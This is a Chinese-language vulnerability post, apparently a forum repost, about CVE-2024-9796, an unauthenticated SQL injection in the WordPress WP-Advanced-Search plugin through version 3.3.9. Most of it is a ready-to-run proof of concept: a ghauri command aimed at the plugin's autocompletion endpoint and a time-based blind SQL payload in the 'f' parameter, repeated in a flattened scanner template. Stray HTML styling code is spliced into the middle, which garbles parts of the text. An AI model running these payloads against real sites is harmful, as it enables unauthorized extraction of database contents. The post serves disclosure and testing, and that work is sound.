CVE-2024-9796 漏洞

admin

WordPress WP-Advanced-Search <= 3.3.9 - 未经身份验证的 SQL 注入漏洞

描述

WordPress 的 WP-Advanced-Search 插件（最高版本为 3.3.9 及包括 3.3.9）容易受到 SQL 注入的攻击。此漏洞的存在是由于用户提供的参数转义不足和缺乏 SQL 查询准备。因此，未经身份验证的攻击者可以将额外的 SQL 查询注入现有查询，从而有可能从数据库中提取敏感信息。

漏洞详情

• 类型：插件
• CVSS 分数：7.5（高）
• CVE：CVE-2024-9796
• 插件 Slug：wp-advanced-search
  

下载链接

下载 WP-Advanced-Search 版本 3.3.9

概念验证 （PoC）

使用端点利用 SQL 注入漏洞的示例：autocompletion-PHP5.5.php

ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899"

有效负载示例

以下有效负载演示了使用 vulnerable 参数的基于时间的盲 SQL 注入：f

[color=rgba(0, 0, 0, 0.96)][color=rgba(0, 0, 0, 0.88)][color=rgba(0, 0, 0, 0.96)]





Parameter: f (GET)Type: time-based blindTitle: MySQL >= 5.0.12 time-based blind (IF - comment)Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853= 5.0.12 time-based blind (IF - comment)Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853" tabindex="0" role="button" style="box-sizing: border-box; position: relative; font-size: 14px; line-height: 20px; text-wrap-mode: nowrap; vertical-align: middle; cursor: pointer; user-select: none; border: 0px; border-radius: 6px; appearance: none; color: rgb(9, 105, 218); background-color: rgba(0, 0, 0, 0); box-shadow: none; transition: color 80ms cubic-bezier(0.33, 1, 0.68, 1), background-color, box-shadow, border-color; width: 28px; height: 28px; display: flex !important; justify-content: center !important; align-items: center !important; margin: 8px !important;">

[color=rgba(0, 0, 0, 0.96)][color=rgba(0, 0, 0, 0.88)][color=rgba(0, 0, 0, 0.96)]





id: CVE-2024-9796 info:  name: "WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection"  author: "Issam Junior"  severity: "critical"  metadata:    verified: true    max-request: 2  tags: "github.com/fa-rrel ==> WHAT DO YOU THINK ABOUT ME ?"variables:  cve: "CVE-2024-9796"  plugin_name: "wp-advanced-search"  plugin_version: "3.3.9"  type: "plugin"  description: |    The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9.     This vulnerability is caused by insufficient escaping on user-supplied parameters and a lack of proper preparation of the existing SQL query.    This makes it possible for unauthenticated attackers to append arbitrary SQL queries to existing queries, potentially leading to the     extraction of sensitive information from the database.  download_link: "https://downloads.wordpress.org/plugin/wp-advanced-search.3.3.9.zip"  cvss_score: 7.5poc:  - "ghauri -u \"https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=19692269759899\""  - "Parameter: f (GET)"  - "Type: time-based blind"  - "Title: MySQL >= 5.0.12 time-based blind (IF - comment)"  - "Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5&timestamp=13672261755853'"